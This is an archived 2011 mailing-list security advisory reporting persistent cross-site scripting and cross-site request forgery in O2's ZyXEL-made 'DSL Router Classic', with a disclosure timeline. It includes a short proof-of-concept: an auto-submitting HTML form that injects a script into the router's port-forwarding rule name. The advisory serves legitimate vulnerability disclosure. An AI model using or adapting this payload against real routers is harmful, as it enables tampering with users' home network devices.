lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20110407194001.5fa9d086@laverne>
Date: Thu, 7 Apr 2011 19:40:01 +0200
From: Hanno Böck <hanno@...eck.de>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: O2 classic router: persistent cross site scripting (XSS) and cross
 site request forgery (CSRF)

O2 classic router: persistent cross site scripting (XSS) and cross site
request forgery (CSRF)

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482
http://int21.de/cve/CVE-2011-0746-o2-router.html

Description

The default DSL router shipped by the german company O2 is completely
vulnerable to persistent cross site scripting (XSS) and cross site
request forgery (CSRF). The device is produced by ZyXEL, it seems it
has no other name than the brand "O2 DSL Router Classic".

As an example, the form at /Forms/PortForwarding_Edit_1 accepts
javascript code for the parameter PortRule_Name, which will be
permanently stored. Also, the form has no protection against CSRF.

A sample code that will inject permanent javascript when called by a
user who is logged into his router:

<form id="form1" method="post"
action="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input
name="PortRule_Name" value='"><script>alert(7)</script>'> <input
name="PortRule_SPort" value="77"> <input name="PortRule_EPort"
value="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" >
<script>
var frm = document.getElementById("form1");
frm.submit();
</script>
This is just an example, all forms in the router interface are
vulnerable to CSRF and, if they accept text input, to XSS.

The vulnerability has been disclosed to O2 in advance without any reply.

Disclosure Timeline

2011-02-03: Vendor contacted
2011-04-07: Published advisory

This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de,
of schokokeks.org webhosting.

 

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ